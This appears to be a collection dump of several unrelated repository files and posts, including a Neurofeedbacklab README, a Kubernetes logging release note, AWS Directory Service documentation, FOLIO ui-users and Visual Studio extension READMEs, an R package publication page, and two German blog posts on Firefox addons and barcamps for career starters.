- dynRangeDec (value from 0 to 1). Decrease in dynamical range in percent if the power value is within the range (every 1/4 sec)
# Make sure Matlab can connect to LSL
After finding the name of your LSL stream using Pyrecorder, adding the path to both LSL and the Neurofeedbacklab src folder, use the following code snippet to check if you can stream data on Matlab
```Matlab
lib = lsl_loadlib();
result = nfblab_findlslstream(lib,'','EEG-name-of-your-lsl-stream')
inlet = lsl_inlet(result{1});
pause(1);
[chunk,stamps] = inlet.pull_chunk();
pause(1);
[chunk,stamps] = inlet.pull_chunk();
figure; plot(chunk');
```
# To get started with Neurofeedbacklab
## Change the settings for your hardware
Edit the file [nfblab_options.m](src/nfblab_options.m) to set you hardware number of channels and sampling frequency, and the name of your LSL stream.
## Save baseline file with ASR (artifact rejection) parameters
If the code below does not work, disable to Matlab psycho toolbox in the [nfblab_options.m](src/nfblab_options.m) file (set to false)
```Matlab
nfblab_process('baseline', 'asrfile.mat', 'baseline_eeg_output.mat')
```
## Run trial session
A trial session takes as input the ASR parameter file saved above and output an EEG file with all the parameters
```Matlab
nfblab_process('trial', 'asrfile.mat', 'trial_eeg_output.mat')
```
## Run series of trial sessions
The program below will ask you for questions on the command line and help organize the data for your subjects (create folders etc...).
```Matlab
nfblab_run
```
| 65.511364 | 809 | 0.760971 | eng_Latn | 0.993043 |
e058bde4c2d2b34961dc5dea35a252ad48569cde | 1,271 | md | Markdown | docs/releases/v1.9.2.md | sighup-io/fury-kubernetes-logging | 0745a61ddaf87785a552199d9590f28716292fa5 | [
"BSD-3-Clause"
] | null | null | null | docs/releases/v1.9.2.md | sighup-io/fury-kubernetes-logging | 0745a61ddaf87785a552199d9590f28716292fa5 | [
"BSD-3-Clause"
] | null | null | null | docs/releases/v1.9.2.md | sighup-io/fury-kubernetes-logging | 0745a61ddaf87785a552199d9590f28716292fa5 | [
"BSD-3-Clause"
] | null | null | null | # Logging Core Module version 1.9.2
:x: This release contains issues do not use.
`fury-kubernetes-logging` is part of the SIGHUP maintained [Kubernetes Fury Distribution](https://github.com/sighupio/fury-distribution). The module ships a logging stack to be deployed on the Kubernetes cluster based on ElasticSearch. Team SIGHUP makes it a priority to maintain these modules in compliance with CNCF and with all the latest features from upstream.
This is a patch release that adds a Makefile to the logging module, along with a `Contributing.md` which describes dev workflow for the module management. This release also updates the bumpversion configuration file.
## Changelog
### Breaking Changes
> None
### Features
> None
### Bug Fixes
> None
### Security Fixes
> None
#### Documentation updates
- [#46](https://github.com/sighupio/fury-kubernetes-logging/pull/46) Add a canonical JSON builder for the logging module
- [#47](https://github.com/sighupio/fury-kubernetes-logging/pull/47) Add KFD labels to all module components
- [#49](https://github.com/sighupio/fury-kubernetes-logging/pull/49) Add Makefile to the logging module
### Upgrade Guide
#### Warnings
This release adds no functionality changes for the kubernetes module. So no upgrade is necessary.
| 43.827586 | 365 | 0.776554 | eng_Latn | 0.932079 |
e058f9742b56fe398a6c11846eaedb270509cf42 | 2,683 | markdown | Markdown | _posts/2007-03-12-novi-addonsmozillaorg.markdown | jablan/stari-blog | 857a81a562ea3e51e42c05020c66d322117e8b50 | [
"MIT"
] | null | null | null | _posts/2007-03-12-novi-addonsmozillaorg.markdown | jablan/stari-blog | 857a81a562ea3e51e42c05020c66d322117e8b50 | [
"MIT"
] | null | null | null | _posts/2007-03-12-novi-addonsmozillaorg.markdown | jablan/stari-blog | 857a81a562ea3e51e42c05020c66d322117e8b50 | [
"MIT"
] | null | null | null | ---
layout: post
title: Novi addons.mozilla.org
date: '2007-03-12 04:30:52 +0100'
mt_id: 199
post_id: 199
author: mileusna
---
Lokacija za preuzimanje Firefox dodataka [addons.mozilla.org](http://addons.mozilla.org) (AMO) uskoro će dobiti svoj novi oblik koji već možete videti na adresi [preview.addons.mozilla.org/en-US/firefox/](http://preview.addons.mozilla.org/en-US/firefox/). Na prvi pogled, interfejs ka korisnicima nije pretrpeo neke veće promene, što nije ni bio osnovni cilj ove verzije. Prave novine nalaze se "ispod haube".
Usled sve veće popularnosti Firefox browsera, volonteri Mozille više nisu uspevali da se izbore sa sve većim brojem prijavljenih ekstenzija. Ekstenzije bi čekale i po mesec dana da ih urednici odobre, a u nedostatku vremena, urednici su odobravali i ekstenzije koje svojim kvalitetom objektivno nisu zasluživale da se pojave na AMO sajtu.
To su samo neki od razloga zašto se pristupilo razvoju novog rešenja kojim se ektenzije dele u dva dela. **Public** deo biće upravo ono što možete videti na preview sajtu, odnosno nešto slično potojećem AMO sajtu. U ovom delu nalaziće se pouzdane i proverene ekstenzije. Sve nove ekstenzije, kao i jedan deo postojećih, biće stavljene u **Sandbox** deo. Na public delu trebalo bi da postoji link ka Sandbox delu sajta kako bi korisnicima bila pružena mogućnost da, ukoliko to žele, preuzmu netestirane i nove ektenzije. Nakon što ekstenizija u sandboxu provede dovoljno vremena, dobije pozitivne komentare i slično (nisam tačno siguran koji su uslovi neophodni da se ispune), autor ekstenzije može svoju ekstenziju nominovati kod urednika za public deo sajta. Urednik potom može a i ne mora odobriti ekstenziju za public deo. Neke ekstenzije nikada neće moći ni da budu nominovane za public deo, pa se u Mozilli nadaju da će sandbox biti pravi filter za sve nove ekstenzije koje se budu pojavljivale.

Kako će se ovaj koncept pokazati u praksi ostaje da se vidi.
Autori ekstenzija od sada će opise svojih programa moći da unose na više jezika. Takođe, omogućeno je postavljanje "privacy policy" i "end users license agreement" teksta direktno na AMO sajtu, tako da korisnici ekstenzija mogu pročitati ove dokumente pre nego preuzmu neku ekstenziju.
Trenutno je koliko vidim u toku provera postojećih ektenzija i njihovo uključivanje u Public deo. Stari Control Panel je već zatvoren, tako da autori mogu svoje ekstenzije da ažuriraju samo na novom sistemu. Prema najavama, novi sistem zameniće postojeći [addons.mozilla.org](http://addons.mozilla.org) 15. marta.
**Update:** Start novog sistema pomeren je za ponedeljak 19. mart četvrtak, 22. mart.
| 107.32 | 1,000 | 0.799105 | bos_Latn | 0.725461 |
e0594e70f3a71fc9c20359d56150060098cc434a | 4,736 | md | Markdown | documents/aws-directory-service-admin-guide/doc_source/ms_ad_getting_started_what_gets_created.md | siagholami/aws-documentation | 2d06ee9011f3192b2ff38c09f04e01f1ea9e0191 | [
"CC-BY-4.0"
] | 5 | 2021-08-13T09:20:58.000Z | 2021-12-16T22:13:54.000Z | documents/aws-directory-service-admin-guide/doc_source/ms_ad_getting_started_what_gets_created.md | siagholami/aws-documentation | 2d06ee9011f3192b2ff38c09f04e01f1ea9e0191 | [
"CC-BY-4.0"
] | null | null | null | documents/aws-directory-service-admin-guide/doc_source/ms_ad_getting_started_what_gets_created.md | siagholami/aws-documentation | 2d06ee9011f3192b2ff38c09f04e01f1ea9e0191 | [
"CC-BY-4.0"
] | null | null | null | # What Gets Created<a name="ms_ad_getting_started_what_gets_created"></a>
When you create a directory with AWS Managed Microsoft AD, AWS Directory Service performs the following tasks on your behalf:
+ Automatically creates and associates an elastic network interface \(ENI\) with each of your domain controllers\. Each of these ENIs are essential for connectivity between your VPC and AWS Directory Service domain controllers and should never be deleted\. You can identify all network interfaces reserved for use with AWS Directory Service by the description: "AWS created network interface for directory *directory\-id*"\. For more information, see [Elastic Network Interfaces](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html) in the Amazon EC2 User Guide for Windows Instances\.
+ Provisions Active Directory within your VPC using two domain controllers for fault tolerance and high availability\. More domain controllers can be provisioned for higher resiliency and performance after the directory has been successfully created and is [Active](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_directory_status.html)\. For more information, see [Deploy Additional Domain Controllers](ms_ad_deploy_additional_dcs.md)\.
+ Creates an [AWS Security Group](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html) that establishes network rules for traffic in and out of your domain controllers\. The default outbound rule permits all traffic ENIs or instances attached to the created AWS Security Group\. The default inbound rules allows only traffic through ports that are required by Active Directory from any source \(0\.0\.0\.0/0\)\. The 0\.0\.0\.0/0 rules do not introduce security vulnerabilities as traffic to the domain controllers is limited to traffic from your VPC, from other peered VPCs, or from networks that you have connected using AWS Direct Connect, AWS Transit Gateway, or Virtual Private Network\. For additional security, the ENIs that are created do not have Elastic IPs attached to them and you do not have permission to attach an Elastic IP to those ENIs\. Therefore, the only inbound traffic that can communicate with your AWS Managed Microsoft AD is local VPC and VPC routed traffic\. Use extreme caution if you attempt to change these rules as you may break your ability to communicate with your domain controllers\. The following AWS Security Group rules are created by default:
**Inbound Rules**
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
**Outbound Rules**
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
+ Creates a directory administrator account with the user name Admin and the specified password\. This account is located under the Users OU \(For example, Corp > Users\)\. You use this account to manage your directory in the AWS Cloud\. For more information, see [Admin Account](ms_ad_getting_started_admin_account.md)\.
**Important**
Be sure to save this password\. AWS Directory Service does not store this password, and it cannot be retrieved\. However, you can reset a password from the AWS Directory Service console or by using the [ResetUserPassword](https://docs.aws.amazon.com/directoryservice/latest/devguide/API_ResetUserPassword.html) API\.
+ Creates the following three organizational units \(OUs\) under the domain root:
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
+ Creates the following groups in the AWS Delegated Groups OU:
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
+ Creates and applies the following Group Policy Objects \(GPOs\):
**Note**
You do not have permissions to delete, modify, or unlink these GPOs\. This is by design as they are reserved for AWS use\. You may link them to OUs that you control if needed\.
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
If you would like to see the settings of each GPO, you can view them from a domain joined Windows instance with the [Group Policy Management Console \(GPMC\)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753298(v=ws.10)) enabled\. | 157.866667 | 1,201 | 0.794975 | eng_Latn | 0.990085 |
e059695101aaab58bb83d54f069650c55a68875f | 2,330 | md | Markdown | README.md | danmaca/DependencyInjectionToolset | fee5d66cea93a2d70e6ff9d2892b4bb9d2c5ef41 | [
"MIT"
] | 12 | 2016-08-21T21:07:15.000Z | 2018-07-03T20:15:14.000Z | README.md | danmaca/DependencyInjectionToolset | fee5d66cea93a2d70e6ff9d2892b4bb9d2c5ef41 | [
"MIT"
] | 8 | 2017-01-23T23:36:32.000Z | 2018-10-05T03:53:36.000Z | README.md | danmaca/DependencyInjectionToolset | fee5d66cea93a2d70e6ff9d2892b4bb9d2c5ef41 | [
"MIT"
] | 7 | 2016-09-27T20:11:26.000Z | 2021-07-24T02:22:11.000Z | # DependencyInjectionToolset
Dependency injection is awesome. It helps you build code that is loosely-coupled, testable, maintainable. The code is
clean and readable. And if set up properly, you might end up coding a lot less than without dependency injection.
Almost :) Because if you use constructor injection (and why wouldn't you if you apply the basic OO principles), you might end
up creating a lot of constructors with a lot of parameters. While this is not a bad thing - after all this gives you an instant
overview about the dependencies of a component - you do have to code a lot.
This tool helps you with that. Features currently include:
* Get the cursor on a private readonly field of an interface or abstract class type (i.e. a field whose type is an interface type or an abstract class type). Hit Ctrl+. (or whatever is your
shortcut for the refactoring suggestions) and choose "Generate dependency injection constructor". This will give you a
constructor which has a parameter for every private readonly field of an interface or abstract class type and the fields
are initialized from the parameters.
* Get your cursor over a constructor parameter. Now hit Ctrl+. and you get two options: you can generate a private
readonly field that is of the same type as your constructor parameter and you have the option to name the field the
same as your parameter, or prefix the name of the parameter with "_".
# Install
Please check the license agreement for terms and conditions.
You can download the extension from the Visual Studio Gallery:
https://visualstudiogallery.msdn.microsoft.com/319cb092-4d7e-429a-894d-ac33e1e78c1b
# Credits
Thanks for [@trydis](https://github.com/trydis) for publishing his version of the "Introduce and initalize field" feature.
Check out his blog post at http://trydis.github.io/2015/01/03/roslyn-code-refactoring/
Also thanks for [@varsi94](https://github.com/varsi94) for helping out with the original version of the code.
<div>Icons made by <a href="http://www.freepik.com" title="Freepik">Freepik</a> from <a href="http://www.flaticon.com" title="Flaticon">www.flaticon.com</a> is licensed by <a href="http://creativecommons.org/licenses/by/3.0/" title="Creative Commons BY 3.0" target="_blank">CC 3.0 BY</a></div>
# Pull requests and ideas are always welcome. :)
| 61.315789 | 293 | 0.777682 | eng_Latn | 0.998659 |
e059c3c20f438f691dd3c71619010b966b4a57b4 | 593 | md | Markdown | browser/README.md | scxr/lorem_ipsum | 64f6fe3344a7a3760e7df5310895ee31cce5841e | [
"MIT"
] | 7 | 2021-11-11T04:06:51.000Z | 2022-01-27T22:09:50.000Z | browser/README.md | scxr/lorem_ipsum | 64f6fe3344a7a3760e7df5310895ee31cce5841e | [
"MIT"
] | 4 | 2021-11-29T21:33:18.000Z | 2022-03-27T02:42:00.000Z | browser/README.md | scxr/lorem_ipsum | 64f6fe3344a7a3760e7df5310895ee31cce5841e | [
"MIT"
] | 6 | 2021-11-11T04:09:49.000Z | 2022-03-25T02:06:41.000Z | # Browser
### The browser extension runs from one file and can only include `const vscode = require('vscode');` and `module.exports = { activate, deactivate };` from node (more info [here](https://code.visualstudio.com/api/extension-guides/web-extensions#web-extension-main-file)).
#### Templates for adding commands (`./browser.js`)
```js
function execute() {
// CODE
};
```
```js
async function execute() {
// CODE
};
```
### Commands must be added to the commands array to be included.
```js
const commands = [
// COMMANDS
{ generate: FUNCTION, name: "COMMAND_NAME" }
];
``` | 29.65 | 271 | 0.669477 | eng_Latn | 0.881378 |
e05a1539d0fcb90b7ceee067e46e0ed526c43a0c | 3,228 | md | Markdown | _posts/2016-08-30-Observational_Study.md | kim00020/kim00020.github.io | de20bae0fe23da3d7b58153ef72319f9e3ced7e4 | [
"MIT"
] | 1 | 2017-04-20T04:16:59.000Z | 2017-04-20T04:16:59.000Z | _posts/2016-08-30-Observational_Study.md | kim00020/kim00020.github.io | de20bae0fe23da3d7b58153ef72319f9e3ced7e4 | [
"MIT"
] | null | null | null | _posts/2016-08-30-Observational_Study.md | kim00020/kim00020.github.io | de20bae0fe23da3d7b58153ef72319f9e3ced7e4 | [
"MIT"
] | null | null | null | ---
layout: post
title: "관측 연구"
author: "JKKim"
date: "August 30, 2016"
comments: true
share: true
---
# 예제
1975년 사이언스지에서는 ``Is there a sex bias in graduate admissions?''라는 제목의 흥미로운 논문이 발표되었습니다. 이 논문에서는 버클리 소재 캘리포니아 주립대학의 대학원 입시 자료를 바탕으로 남성과 여성 지원자간에 합격률의 차이가 있는지를 분석하였습니다. 먼저 이 자료에 의하면 특정기간 동안 현황을 살펴보면 8,422명의 남학생이 지원하여 44% 가 합격하였고 4,321명의 여학생이 지원하여 35% 가 합격했다고 합니다. 그러니 이 자료로부터 대학원 입시 과정에서 성차별이 존재하는 것이 아니냐고 합리적인 의심을 할수 밖에 없었을 것입니다.
그래서 전공 학과별로 자료를 분석하여 어떤 학과에서 문제가 있었던 것인지를 밝혀내기로 하고 다음과 같은 결과를 얻었다고 합니다.
|성별 |전공 | 지원자수| 합격률 (%)|
|-----| --------|---------|---------|
| 남성| A | 825 | 62 |
| 남성| B |560 | 63 |
| 남성| C | 325 | 37 |
| 남성| D | 417 | 33 |
| 남성 | E | 191 | 28 |
| 남성 | F | 373 | 6 |
한편 여학생 자료는 다음과 같습니다.
|성별 |전공 | 지원자수| 합격률 (%)|
|-----| --------|---------|---------|
| 여성| A | 108 | 82 |
| 여성| B | 25 | 68 |
| 여성| C | 593 | 34 |
| 여성| D | 375 | 35 |
| 여성 | E | 393 | 24 |
| 여성 | F | 341 | 7 |
위의 6개 전공학과의 자료를 비교해 보면 남학생과 여학생간의 합격률 차이가 별로 없습니다. 오히려 여학생이 더 높은 것처럼 나타납니다. 뭐가 잘못된 것일까요?
# 풀이
위의 사례처럼 세부 집단으로 들어가서 보았을때 자료로 부터 얻어진 결론이 바뀌어서 나타나는 현상을 *Simpson's paradox*라고 부릅니다. 이러한 파라독스가 발생하는 원인은 지원자들의 전공 선택과 성별이 교락(confounding)되었기 때문인데요 이를 좀더 자세히 설명하면 다음과 같습니다. 전공 A와 B는 합격률이 높은 전공이고 나머지 전공은 합격률이 낮은 전공입니다. 즉, 전공 A와 B는 들어가기 쉬운 학과인 것이지요. 위의 테이블에 의하면 남학생들은 이 전공에 많이 지원했지만 여학생들은 그렇지 않았습니다. 그래서 들어가기 쉬운 전공에 남학생들이 많이 지원해서 합격률이 높게 나타난것처럼 보이는 것입니다. 극단적으로 학과가 2개밖에 없다고 할때 A 학과에는 모두 남자가 지원하고 B 학과에는 모두 여자가 지원했다면 합격률의 차이가 남녀의 합격률의 차이에 의한 것인지 학과 자체의 합격률 차이에 의한 것인지 구분해 낼수 없습니다.
다시 말하자면 남학생들은 들어가기 쉬운 학과에 많이 지원했기 때문에 전체 남자 지원자 중에서 보면 합격률이 높이 나오는 것처럼 착시 현상이 나타난것 뿐입니다. 좀더 공평한 비교를 위해서는 위의 테이블처럼 전공별로 쪼개어 보던가 아니면 남녀별 합격률 계산을 제대로 다시해야 합니다.
위의 테이블에서 보다 공평한 남여별 합격률을 계산하기 위해서는 가중치를 남녀별 지원자수가 아닌 전체 지원자를 바탕으로 계산해야 합니다. 즉, 아래 테이블에서처럼 전체 지원자수를 계산하고 이를 바탕으로 합격률을 구하면 다음과 같습니다.
|전공 | 전체 지원자수| 남자 합격률 (%)| 여자 합격률 |
| --------|---------|---------|----------|
| A | 933 | 62 | 82 |
| B | 585 | 63 | 68 |
| C | 918 | 37 | 34 |
| D | 792 | 33 | 35 |
| E | 584 | 28 | 24 |
| F | 714 | 6 | 7 |
|Total |4,526 | 39 | 43 |
즉, 전체 지원자수를 바탕으로 합격률을 가중 평균하면 남자는 39%, 여자는 43% 으로 계산되어 오히려 여자의 합격률이 높은 것으로 나타납니다. 성별 지원자수가 아닌 전체 지원자수를 바탕으로 가중평균을 구하는 방법은 교락요인을 통제해 주는 효과를 가져옵니다.
# 토론
1. 위의 데이터는 관측 연구(observational study) 에서 얻어진 것입니다. 실험(experiment)가 아닌 관측 연구 자료의 분석은 교락요인이 통제가 되지 않아서 잘못된 결론을 얻기가 매우 싶습니다. 일반적으로 말해서 인과관계는 실험을 통해서 입증을 할수 있고 관측연구에서는 인과(causality) 관계가 아닌 상관(association) 관계 만을 밝혀낼 뿐입니다.
2. 관측 연구에서 가장 어려운 점은 모든 교락요인을 다 통제하지 못할수 있다는 것입니다. 실험이 아니므로 randomization 을 이용한 통제가 불가능하고 사후적으로 분석 단계에서 통제를 해야 하는데 문제는 관측되지 않는 교락 요인이 있을수 있다는 것입니다.
3. 위의 예에서는 전공 선택이 명백한 교략요인이었기에 이를 통제하기가 쉬웠는데 다른 경우에는 그게 명백하지 않을수 있습니다. 회귀분석(regression analysis)을 통해서 관측연구 자료를 분석할때 관심 요인 외에도 다른 요인을 설명변수에 넣어주는 것도 그러한 요인을 통제하고자 하는 것입니다. 즉, 다른 (관측된) 요인이 동일하다고 했을때 관심 요인이 반응 변수에 얼마나 영향을 미치는지 보고자 하는 것입니다. 그런데 만약 중요한 교락 요인이 이 회귀 분석에서 누락되었다면 인과관계 입증은 실패하는 것입니다. 유명한 통계학자 R.A. Fisher 경도 그러한 이유로 담배가 폐암의 직접적인 원인이 된다는 것을 받아들이지 않았습니다.
| 38.891566 | 475 | 0.578686 | kor_Hang | 1.00001 |
e05b71ed5c21beb3699820e406d7fb842690671f | 3,736 | md | Markdown | README.md | usavkov-epam/ui-users | 039c62b77688e4ec802ea49a1ebdf724c51bf090 | [
"Apache-2.0"
] | 4 | 2018-02-06T19:45:32.000Z | 2021-09-13T06:18:15.000Z | README.md | usavkov-epam/ui-users | 039c62b77688e4ec802ea49a1ebdf724c51bf090 | [
"Apache-2.0"
] | 1,339 | 2017-01-06T00:04:47.000Z | 2022-03-31T16:47:42.000Z | README.md | usavkov-epam/ui-users | 039c62b77688e4ec802ea49a1ebdf724c51bf090 | [
"Apache-2.0"
] | 61 | 2017-01-05T22:53:23.000Z | 2022-02-07T13:37:28.000Z | # ui-users
Copyright (C) 2016-2020 The Open Library Foundation
This software is distributed under the terms of the Apache License,
Version 2.0. See the file "[LICENSE](LICENSE)" for more information.
## Introduction
The Users UI Module, or `ui-users`, is a Stripes UI module used for searching, sorting, filtering, viewing, editing and creating users. (A "Stripes UI module" is an NPM module that adheres to certain conventions that allow it to function within the [Stripes UI framework](https://github.com/folio-org/stripes-core/blob/master/README.md) that is part of FOLIO.)
The Users UI module is important because it is the first user-facing module to have undergone development. FOLIO has several [server-side modules](https://dev.folio.org/source-code/#server-side) that run under Okapi (mod-auth, mod-configuration, mod-metadata, mod-files, etc.), but mod-users is the only one that has a corresponding UI component. Accordingly, the Users UI module serves as a testbed for new Stripes functionality and a place to shake down those parts of the UI design that will be shared between all FOLIO applications.
## Installation
First, a Stripes UI development server needs to be running. See the [quick start](https://github.com/folio-org/stripes-core/blob/master/doc/quick-start.md) instructions, which explain how to run it using packages from the FOLIO NPM repository or use some parts from local in-development versions.
The "ui-users" module is already enabled by that default configuration.
The other parts that are needed are the Okapi gateway, various server-side modules (including mod-users), and sample data. Ways to achieve that are described in [Running a complete FOLIO system](https://github.com/folio-org/ui-okapi-console/blob/master/doc/running-a-complete-system.md).
(At some point, this process will be dramatically streamlined; but at present, this software is primarily for developers to work on, rather than for users to use.)
## Build and serve
To build and serve `ui-users` in isolation for development purposes, run the "start" package script.
```
$ yarn start
```
The default configuration assumes an Okapi instance is running on http://localhost:9130 with tenant "diku". The options `--okapi` and `--tenant` can be provided to match your environment.
```
$ yarn start --okapi http://localhost:9130 --tenant diku
```
See the [serve](https://github.com/folio-org/stripes-cli/blob/master/doc/commands.md#serve-command) command reference in `stripes-cli` for a list of available options. Note: Stripes-cli options can be persisted in [configuration file](https://github.com/folio-org/stripes-cli/blob/master/doc/user-guide.md#configuration) for convenience.
## Tests
Integration tests require a running Okapi. The default configuration expects Okapi running on http://localhost:9130 with tenant "diku". To build and run integration tests for `ui-users` with these defaults, run the `test-int` script.
```
$ yarn test-int
```
To view tests while they are run, provide the `--show` option.
```
$ yarn test-int --show
```
To skip the build step and run integration tests against a build that is already running, provide the URL.
```
$ yarn test-int --url https://folio-testing.dev.folio.org/
```
As a convenience, `--local` can be used in place of `--url http://localhost:3000` for running tests a development server that has already been started.
```
$ yarn test-int --local
```
## Additional information
Other [modules](https://dev.folio.org/source-code/#client-side).
See project [UIU](https://issues.folio.org/browse/UIU)
at the [FOLIO issue tracker](https://dev.folio.org/guidelines/issue-tracker).
Other FOLIO Developer documentation is at [dev.folio.org](https://dev.folio.org/)
| 54.144928 | 536 | 0.764454 | eng_Latn | 0.981328 |
e05b8be30742cdba4d21cf6bffbde191037a041e | 2,986 | md | Markdown | content/publication/muir-2019b.md | cdmuir/website | d9acefd1b6cfcfc8fd84659201ad8348bd8c9a20 | [
"MIT"
] | null | null | null | content/publication/muir-2019b.md | cdmuir/website | d9acefd1b6cfcfc8fd84659201ad8348bd8c9a20 | [
"MIT"
] | null | null | null | content/publication/muir-2019b.md | cdmuir/website | d9acefd1b6cfcfc8fd84659201ad8348bd8c9a20 | [
"MIT"
] | null | null | null | +++
title = "tealeaves: an R package for modelling leaf temperature using energy budgets"
date = 2019-08-01T00:00:00
# Authors. Comma separated list, e.g. `["Bob Smith", "David Jones"]`.
authors = ["CD Muir"]
# Publication type.
# Legend:
# 0 = Uncategorized
# 1 = Conference proceedings
# 2 = Journal
# 3 = Work in progress
# 4 = Technical report
# 5 = Book
# 6 = Book chapter
publication_types = ["2"]
# Publication name and optional abbreviated version.
publication = "*AoB Plants*"
publication_short = "*AoB Plants*"
# Abstract and optional shortened version.
abstract = "Plants must regulate leaf temperature to optimize photosynthesis, control water loss, and prevent damage caused by overheating or freezing. Physical models of leaf energy budgets calculate the energy fluxes and leaf temperatures for a given set leaf and environmental parameters. These models can provide deep insight into the variation in leaf form and function, but there are few computational tools available to use these models. Here I introduce a new R package called **tealeaves** to make complex leaf energy budget models accessible to a broader array of plant scientists. This package enables novice users to start modelling leaf energy budgets quickly while allowing experts customize their parameter settings. The code is open source, freely available, and readily integrates with other R tools for scientific computing. This paper describes the current functionality of **tealeaves**, but new features will be added in future releases. This software tool will advance new research on leaf thermal physiology to advance our understanding of basic and applied plant science."
# Featured image thumbnail (optional)
image_preview = ""
# Is this a selected publication? (true/false)
selected = true
# Projects (optional).
# Associate this publication with one or more of your projects.
# Simply enter the filename of your project in `content/project/`.
# Otherwise, set `projects = []`.
# e.g. projects = ["example-external-project.md"]
projects = ["photosynthesis.md"]
# Links (optional).
url_pdf = "https://doi.org/10.1093/aobpla/plz054"
url_preprint = "https://doi.org/10.1101/529487"
url_code = "https://github.com/cdmuir/tealeaves-ms"
#url_dataset = "#"
#url_project = "#"
#url_slides = "#"
#url_video = "#"
#url_poster = "#"
#url_source = "#"
# Custom links (optional).
# Uncomment line below to enable. For multiple links, use the form `[{...}, {...}, {...}]`.
url_custom = [{name = "R Package (CRAN)", url = "https://CRAN.R-project.org/package=tealeaves"}, {name = "R Package (GitHub)", url = "https://github.com/cdmuir/tealeaves"}]
# Does the content use math formatting?
math = false
# Does the content use source code highlighting?
highlight = true
# Featured image
# Place your image in the `static/img/` folder and reference its filename below, e.g. `image = "example.jpg"`.
[header]
image = "tealeaves-hex-sticker.png"
caption = "tealeaves hex sticker"
size = 200
+++
| 44.567164 | 1,096 | 0.741795 | eng_Latn | 0.963345 |
e05c84991fdb62fc3a6a4ddf04ce12a3484e531f | 7,621 | md | Markdown | _posts/2016-05-19-Wie-dir-Barcamps-beim-Berufseinstieg-helfen.md | gabrielgz92/christina-blog | 4e62ce84bf58832e3d74a7b5783091d4b1a1f92a | [
"MIT"
] | null | null | null | _posts/2016-05-19-Wie-dir-Barcamps-beim-Berufseinstieg-helfen.md | gabrielgz92/christina-blog | 4e62ce84bf58832e3d74a7b5783091d4b1a1f92a | [
"MIT"
] | null | null | null | _posts/2016-05-19-Wie-dir-Barcamps-beim-Berufseinstieg-helfen.md | gabrielgz92/christina-blog | 4e62ce84bf58832e3d74a7b5783091d4b1a1f92a | [
"MIT"
] | null | null | null | ---
layout: post
title: "Wie dir Barcamps beim Berufseinstieg helfen"
author: Writing
categories: [ Articles in German, Work ]
image: assets/images/20160519_Barcamp-Berufseinstieg-1024x576.jpg
---
In der kritischen Phase des Berufseinstiegs ist Netzwerken das A und O, daran besteht längst kein Zweifel mehr. Da gibt es auf der einen Seite Leute wie mich, die total extrovertiert sind, gerne mit neuen Leuten in Kontakt kommen und total darin aufgehen, auch im beruflichen Kontext interessante Menschen kennenzulernen. Auf der anderen Seite gibt es wiederum solche, bei denen der Gedanke, sich scheinbar ohne Anlass mit anderen vernetzen zu “müssen”, eher Unbehagen verursacht.
Und doch bin ich überzeugt, dass das alles nicht nur total wichtig ist, sondern auch enormen Spaß machen kann – wenn man nur den richtigen Rahmen dafür wählt. Langweilige Karrieremessen, stumpfes Visitenkarten-Karussel spielen ohne Sinn und Verstand sind weder effektiv noch spaßig. Und das muss es auf jeden Fall sein, finde ich: spaßig. Das wird gerne mal vergessen, wenn von allen Seiten gepredigt wird, dass man sich vernetzen muss. Networking hier, Kontakte dort, Xing, LinkedIn und so weiter. Wenn man es nur als “Sport” betrachtet, geht ja das Menschliche total verloren. Vielleicht ist das ja auch der Grund, warum es vielen Leuten so schwerfällt.
“Netzwerken light” – voll und ganz unverkrampft
Steckt man erst mal im Beruf drin, funktioniert das wohl auch ganz gut mit dem Vernetzen: man lernt auf ganz natürlichem Weg Geschäftspartner und Kollegen kennen, trifft sich zum Mittagessen, bleibt in Kontakt.
Aber wie macht man es, wenn man als Newbie außer Kommilitonen und Co-Stammkneipenbesuchern keinen kennt? Wie kommt man an die Leute ran, mit denen man sich vernetzen sollte und mit denen man Interessen, Fähigkeiten und Leidenschaften teilt? Mein nicht ganz so geheimer Geheimtipp lautet: Barcamps. Wenn du noch nicht weißt was das ist, kannst du es hier nachlesen.
Socializing statt nur netzwerken
Ganz unverkrampft kommst du bei Barcamps mit Leuten in Berührung, die coole Sachen machen, mit denen man sich super austauschen kann und mit denen man gerne in Kontakt bleibt. Beim Kaffeepläuschchen stellt sich nicht selten heraus, dass dein Gegenüber aus der Branche kommt, für die du dich interessierst oder in der du dich bewerben möchtest. Natürlich hat diese Person jetzt nicht rein zufällig einen Job zu vergeben, den sie dir gleich zuschiebt. Der Wert von solchen Begegnungen liegt in erster Linie im Austausch miteinander. Nahezu alle Leute geben sehr gerne Tipps und Hinweise, beantworten Fragen zu ihrem Fachgebiet und interessieren sich in den allermeisten Fällen auch für deine Perspektive. Wenn dabei die eine oder andere Visitenkarte ausgetauscht wird – umso besser.
“Und was machst du so?”
Was ich bei solchen Events immer extrem spannend finde ist, dass ich so viele interessante Leute zu ihrem Berufsalltag ausfragen kann. So lerne ich viele verschiedene Berufsbilder und Branchen kennen, von denen ich vielleicht noch gar keine Ahnung hatte. Heute existieren so viele Berufe, die es vor 5 oder 10 Jahren noch überhaupt nicht gab – was könnte interessanter sein, als mal auf Tuchfühlung zu gehen. Beispiel: Blogger, Hacker oder YouTuber. “Was, mit sowas kann man Geld verdienen?!” Ja, kann man. Man muss nur die Augen offen halten und sich informieren, was es alles für tolle Berufsbilder gibt.
Who is who – von Experten und Influencern
